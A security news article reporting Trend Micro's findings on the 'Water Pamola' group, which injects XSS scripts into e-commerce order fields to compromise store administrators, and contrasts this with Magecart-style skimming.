Website vulnerabilities abused in new hacking campaign
An established organized crime group has switched tactics by launching attacks on e-commerce stores that leverage cross-site scripting (XSS) exploits instead of traditional phishing lures.
The group, dubbed ‘Water Pamola’ by Trend Micro, has been busy attacking e-commerce shops in Japan, Australia, and European countries using spam emails with malicious attachments for the last two years.
This malicious code is inserted into the field where the customer’s address or company name would normally be located.
The rogue script is likely activated by exploiting an XSS vulnerability in a targeted store’s administration portal, according to Trend Micro.
“The malicious behavior performed by the scripts includes page grabbing, credential phishing, web shell infection, and malware delivery,” the infosec firm explains in a blog post on the ongoing campaign.
Data breach linked to Water Pamola
In at least one case, administrators of a website that fell victim to Water Pamola later disclosed that they had suffered a data breach.
Their server was illegally accessed and personal information, which included names, credit card numbers, card expiration dates, and credit card security codes, was potentially leaked.
This points to a Magecart-style attack with the twist that cybercriminals are not after a specific e-commerce framework, but e-commerce systems in general.
“If the store’s e-commerce system is vulnerable to XSS attacks, the malicious script will be loaded and executed on the merchant’s management panel once someone (like a system administrator or store employee) opens the [malicious] order,” Trend Micro concludes.
The attack scripts were managed with an XSS attack framework called ‘XSS.ME’, which cybercriminals have further developed and customized to go beyond out-of-the box abilities to steal location and browser cookies.
The source code of this framework is shared across many Chinese public forums, according to Trend Micro.
The same attackers are also using a secondary line of attack that relies on social engineering to phish credentials or trick recipients into downloading malware under the guise of an Adobe Flash update.
There are several Magecart attacker groups. They usually embed a skimmer into e-commerce webpages (via exploiting a vulnerability, gaining access to victim's network, compromising third party libraries, etc).
Whenever data is entered into a form, the skimmer sends a copy of the data to a command-and-control server.
In short, Magecart-style attacks target website visitors, whereas Water Pamola targets website administrators, Trend Micro's Jaromir Horejsi told The Daily Swig.
“The attacker discovered [an] XSS vulnerability in [the EC-CUBE] framework, which is popular in Japan, thus Japanese sites are targeted,” Horejsi explained. “We can only speculate why they target websites built with [a] framework popular in Japan in the first place.
“Although the number of targeted e-commerce shops is not high, we need to remember that each online shop can have many customers,” the researcher concluded.